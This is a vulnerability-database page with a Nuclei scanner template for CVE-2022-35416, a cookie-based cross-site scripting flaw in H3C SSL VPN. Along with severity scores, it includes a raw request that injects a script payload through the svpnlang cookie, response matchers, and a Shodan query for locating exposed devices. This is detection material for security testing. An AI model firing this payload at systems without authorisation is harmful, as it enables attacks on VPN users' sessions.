Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-35416
HistoryJul 14, 2022 - 10:43 a.m.

H3C SSL VPN <=2022-07-10 - Cross-Site Scripting

2022-07-1410:43:06
ProjectDiscovery
github.com
28

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

42.0%

H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.
id: CVE-2022-35416

info:
  name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting
  author: 0x240x23elu
  severity: medium
  description: |
    H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-9x76-78gc-r3m9
    - https://github.com/Docker-droid/H3C_SSL_VPN_XSS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35416
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/bughunter0xff/recon-scanner
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35416
    cwe-id: CWE-79
    epss-score: 0.00102
    epss-percentile: 0.41641
    cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: h3c
    product: ssl_vpn
    shodan-query: http.html_hash:510586239
  tags: cve,cve2022,xss,vpn,h3c

http:
  - raw:
      - |
        GET /wnm/login/login.json HTTP/1.1
        Host: {{Hostname}}
        Cookie: svpnlang=<script>alert('document.domain')</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert('document.domain')</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d82b266b0760fde1b26ab005ed128cfe7c783b52db28f94bc666c9d03bb196002210098ccdcab8e372c1dd43317407e690f228e8cb1bc1c8add5c95870ceb805b2713:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

42.0%

Related for NUCLEI:CVE-2022-35416